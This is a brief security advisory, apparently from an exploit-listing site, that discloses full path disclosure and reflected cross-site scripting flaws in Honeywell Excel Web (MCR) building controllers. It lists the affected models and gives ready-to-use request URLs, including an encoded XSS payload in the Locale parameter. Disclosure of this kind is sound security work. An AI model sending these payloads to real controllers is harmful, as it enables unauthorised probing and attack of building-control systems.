Honeywell MCR Web Controller Cross Site Scripting / Path Disclosure

2019.11.12

Credit: Pablo Rebolini

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Honeywell MCR Web Controller
# Full Path Disclosure & Cross Site Scripting
# Vendor Homepage: https://www.honeywell.com
# WebVersion:
XL1000C50 EXCEL WEB 52 I/O,
XL1000C500 EXCEL WEB 300 I/O,
XL1000C100 EXCEL WEB 104 I/O,
XL1000C1000 EXCEL WEB 600 I/O,
XL1000C50U EXCEL WEB 52 I/O UUKL,
XL1000C500U EXCEL WEB 300 I/O UUKL,
XL1000C100U EXCEL WEB 104 I/O UUKL,
XL1000C1000U EXCEL WEB 600 I/O UUKL.
# Tested on: EXCEL WEB - AIT AG XL1000C1000U
600 I/O UUKL - 05.03.2008
# Date: Nov 09, 2019
# Informer: Pablo Rebolini - <rebolini.pablo[x]gmail.com>
# Full Path Disclosure
http://<excel-web.host>/standard/login/help.php
http://<excel-web.host>/standard/login/help.php?Locale=1033&ID[]=0
# Cross Site Scripting
http://
<excel-web.host>/standard/default.php?Locale=%22%3C/script%3E%3Ch1%3EXSS%3C/%22

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Honeywell MCR Web Controller Cross Site Scripting / Path Disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.